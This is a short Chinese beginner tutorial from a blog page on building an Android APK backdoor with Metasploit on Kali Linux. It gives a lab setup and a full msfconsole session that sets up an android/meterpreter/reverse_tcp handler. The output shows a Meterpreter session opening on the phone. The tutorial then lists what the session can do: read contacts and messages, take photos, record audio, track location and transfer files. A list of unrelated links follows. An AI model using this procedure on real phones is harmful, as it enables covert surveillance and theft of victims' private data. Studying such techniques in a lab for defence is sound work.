• Kali之Metasploit生成apk后门控制安卓


    扫盲教程,大佬勿喷。

    实验中请更改为你环境的IP。

    生成apk后门

    Kali Linux(Hack):192.168.169.76

    Android(靶机):192.168.169.137

    启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊

    lhost为kali的ip,lport指定一个端口。

    开metasploit控制台侦听

    root@kali:~# msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
    payload => android/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
    lhost => 192.168.169.76
    msf exploit(handler) > set lport 445 #对应刚才设的端口
    lport => 445
    msf exploit(handler) > exploit
     
    [*] Started reverse TCP handler on 192.168.169.76:445
    [*] Starting the payload handler...
    [*] Sending stage (63194 bytes) to 192.168.169.137
    [*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
    

      

    复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。

    可以看下帮助都有啥操作

    meterpreter > help

    功能示例

    读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。

    Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓

    Kali之Metasploit生成apk后门控制安卓

    补充freebuf上的文章:

     
     
  • 相关阅读:
    python动态规划解决矩阵连乘
    ISCC2019-digdigdig
    MultiSelectComboBox(一)
    中国地图 xaml Canvas
    NotificationObject.cs
    DelegateCommand.cs
    SQL-PIVOT 数据透视 行列转换
    中国行政区域(省,市,县)SQL
    WCF自定义地址路由映射(不用svc文件)
    java下载安装,环境变量,hello world
  • 原文地址:https://www.cnblogs.com/zerlong/p/8430130.html
Copyright © 2020-2023  润新知